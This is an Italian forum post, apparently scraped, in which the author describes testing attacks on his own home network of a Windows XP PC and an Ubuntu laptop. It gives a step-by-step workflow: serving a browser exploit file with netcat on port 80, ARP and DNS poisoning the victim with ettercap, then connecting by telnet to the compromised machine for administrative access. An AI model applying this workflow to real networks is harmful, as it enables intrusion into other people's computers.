-
Red!.
User deleted
La configurazione e' la seguente:
1 pc connesso con Windows XP originale ed aggiornato con firewall configurato "senza eccezioni" ed un antivirus "avira" anche esso aggiornato quotidianamente, connesso direttamente sull' hag di fastweb
1 laptop connesso tramite wireless con ubuntu 10.10
Gli exploit che ho provato, con un sistema aggiornato e senza servizi aggiuntivi, sono perlopiu' inefficaci.
Tranne per quelli che sfruttano le debolezze del browser "Mozilla o Internet Explorer" che si sono rivelati estremamente efficaci ed invisibili sia al firewall che all' antivirus.
La tecnica utilizzata e' la seguente:
Mi connetto alla rete wireless.
Metto in ascolto l'exploit sulla porta 80 del laptop.
Ovvero uso il comando ncCODICEnc -l 80 < ./ExploitperIE.txt
Avveleno i DNS rinviando la connessione del pc sull' IP del laptop.
Ovvero uso ettercap per fare un DNS PoisoningCODICEettercap -TqP dns_spoof -i "scheda wireless" -M ARP /"IP PC"/
Aspetto il trigger dell' exlpoit.
Sano i DNS.
chiudo ettercap conCODICEq
Mi connetto al computer exploitato con privilegi amministrativi.CODICEtelnet "IP" "Porta Exploit".